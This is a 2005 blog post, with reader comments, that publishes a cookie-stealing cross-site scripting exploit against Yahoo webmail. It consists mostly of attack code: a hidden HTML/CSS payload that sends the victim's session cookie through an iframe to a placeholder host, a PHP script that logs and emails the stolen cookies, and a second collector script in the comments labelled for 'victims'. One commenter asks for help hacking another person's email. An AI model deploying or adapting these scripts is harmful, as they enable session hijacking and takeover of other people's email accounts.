Subscribe via feed.

Yahoo exploit: no password needed

Posted by deepquest on December 12, 2005 – 6:10 am

Once again webmail services are facing security issues. This one aim the same target: connect without user’s password. This time yahoo is vulnerable.

Code:
 
<DIV id=b style="VISIBILITY: hidden">
<STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900); b.innerHTML='<iframe src=http://your-site-here.com/script.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\'  frameborder=0 width=10 height=10></iframe>';" type=text/css>
</STYLE>
</DIV>

script.php:

Code:
 
<?
$file="cookie.log";
if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){
 $logcookie = $_REQUEST["cookie"];
 $logcookie = rawurldecode($logcookie);
 $logemail = $_REQUEST["id"];
 $logemail = rawurldecode($logemail);
 if (file_exists($file)) {
   $handle=fopen($file, "r+");
   $filecontence=fread($handle,filesize("$file"));
   fclose($handle);
 }
 $handle=fopen($file, "w");
 fwrite($handle, "$logemail - $logcookie\n$filecontence\n ");
 //Writing email address and cookie then the rest of the log
 fclose($handle);
mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n");
}
header("Location: [url=http://mail.yahoo.com/]http://mail.yahoo.com[/url]");
?>

to protect from it make sure you hit the logout link instead of just closing the browser window. also this only works for internet explorer so use any other browser.


This post is under “Security” and has no respond so far.
If you enjoy this article, make sure you subscribe to my RSS Feed.

No Respond so far- Add one»

  1. 1. hireism Said:
    December 12th, 2005 at 1:17 pm

    Doesn’t seem to work?

  2. 2. deepquest Said:
    December 12th, 2005 at 8:06 pm

    well exploit doesn’t ALWAYS work out of the box, only to prevent ppl to copy/paste (usually script kiddies) and use the exploit. I see at least 2 errors of syntax, rere the code. Very easy to see.

  3. 3. lord Said:
    December 28th, 2005 at 12:14 pm

    this is cookie munching?

  4. 4. bresti Said:
    January 16th, 2006 at 3:39 am

    and the errors is ??
    because my script is :

    <?php
    // email
    $results = “dadoamna@yahoo.com”;

    // done
    $email = $_GET[‘id’];
    $cookie = urldecode($_GET[‘cookie’]);
    $mesaj = “Victim :: $email\nCookie data: \n$cookie\n”;
    mail($results, “Cookie victim $email”, $mesaj);
    ?>

  5. 5. deepquest Said:
    January 16th, 2006 at 3:46 am

    maybe fixed by yahoo but chmod your log file.

  6. 6. Exos Said:
    June 11th, 2006 at 4:13 pm

    someone hacked my email-id and I want to hack his


« »